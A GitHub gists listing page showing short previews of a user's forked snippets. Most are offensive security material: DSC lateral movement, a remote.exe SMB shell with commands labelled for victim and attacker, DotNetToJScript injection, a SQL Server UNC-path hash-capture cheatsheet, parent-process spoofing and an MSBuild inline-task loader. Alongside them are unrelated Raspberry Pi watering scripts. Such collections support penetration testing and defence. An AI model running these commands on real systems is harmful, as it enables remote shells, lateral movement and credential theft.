unbaiat’s gists

unbaiat / PowerShellDSCLateralMovement.ps1

Created March 18, 2018 11:56 — forked from mattifestation/PowerShellDSCLateralMovement.ps1

	# This idea originated from this blog post on Invoke DSC Resources directly:
	# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

	<#
	$MOFContents = @'
	instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
	{
	ResourceID = "[Script]ScriptExample";
	GetScript = "\"$(Get-Date): I am being GET\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	TestScript = "\"$(Get-Date): I am being TESTED\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

unbaiat / gist:76ecf73812c291d2f63414a124ec0ec9

Created March 18, 2018 11:59 — forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301

remote.exe - a useful, MS signed SMB shell

	# Command to run on the victim
	# This will establish a PowerShell listener over the "pwnme" named pipe
	remote /S "powershell.exe" pwnme

	# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
	runas /netonly /user:[Domain\|Hostname\Username] "cmd"
	remote /C [Hostname\IP] "pwnme"

unbaiat / Inject.cs

Created March 21, 2018 05:12

DotNetToJScript Build Walkthrough

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	public class TestClass
	{

	public TestClass()
	{}

unbaiat / all.txt

Created March 25, 2018 06:52 — forked from jhaddix/all.txt

all wordlists for every dns enumeration tool... ever.

unbaiat / SQL Server UNC Path Injection Cheatsheet

Created April 7, 2018 12:44 — forked from nullbind/SQL Server UNC Path Injection Cheatsheet

SQL Server UNC Path Injection Cheatsheet

	This is a list of SQL Server commands that support UNC path [injections] by default.
	The injections can be used to capture or replay the NetNTLM password hash of the
	Windows account used to run the SQL Server service. The SQL Server service account
	has sysadmin privileges by default in all versions of SQL Server.

	Note: This list is most likely not complete.

	-----------------------------------------------------------------------
	-- UNC Path Injections Executable by the Public Fixed Server Role
	-----------------------------------------------------------------------

unbaiat / main.html

Created May 7, 2018 13:44 — forked from benrules2/main.html

	<!DOCTYPE html>
	<head>
	<title>{{ title }}</title>
	</head>

	<body>
	<h1>PLANT HELPLINE</h1>
	<h2>The date and time on the server is: {{ time }}</h2>
	<h2> {{ text }} </h2>
	<a href="/auto/water/ON"><button>Turn ON Auto Watering</button></a>

unbaiat / auto_water.py

Created May 7, 2018 13:44 — forked from benrules2/auto_water.py

unbaiat / water.py

Created May 7, 2018 13:45 — forked from benrules2/water.py

	# External module imp
	import RPi.GPIO as GPIO
	import datetime
	import time

	init = False

	GPIO.setmode(GPIO.BOARD) # Broadcom pin-numbering scheme

	def get_last_watered():

unbaiat / GetSystem.ps1

Created May 17, 2018 10:10

PowerShell GetSystem => Test for MITRE ATT&CK T 1134

	<#

	$owners = @{}
	gwmi win32_process \|% {$owners[$_.handle] = $_.getowner().user}
	get-process \| select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

	#>

	#Simple powershell/C# to spawn a process under a different parent process
	#Launch PowerShell As Administrator

unbaiat / msbuild_ghostpack_seatbelt.txt

Created October 28, 2018 07:03 — forked from curi0usJack/msbuild_ghostpack_seatbelt.txt

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="NotSubTee">
	<BusinessTime />
	</Target>
	<UsingTask
	TaskName="BusinessTime"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<ParameterGroup/>
	<Task>

unbaiat unbaiat